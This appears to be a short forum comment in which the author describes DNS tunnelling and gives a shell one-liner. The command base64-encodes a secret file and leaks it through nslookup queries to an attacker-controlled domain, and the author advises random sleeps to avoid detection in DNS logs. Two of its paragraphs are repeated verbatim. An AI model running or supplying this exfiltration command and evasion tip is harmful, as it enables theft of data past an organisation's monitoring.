Yup - about 8 years ago or so, I built a TCP-over-DNS tunnel that smuggled data in DNS TXT records generated by a DNS server
It's even easier that if you just want to sneak a relatively small file out.
for n in $(base64 mysecretfile|sed 's/.\{63\}/&\n/g'); do nslookup $n.myevildomain.com; done
Then get the file out of your evil DNS server logs at the other end. Of course this depends on how much DNS logging the local site is doing and if anyone is paying attention to those logs, but a few random sleeps should help there.
It's even easier that if you just want to sneak a relatively small file out.
Then get the file out of your evil DNS server logs at the other end. Of course this depends on how much DNS logging the local site is doing and if anyone is paying attention to those logs, but a few random sleeps should help there.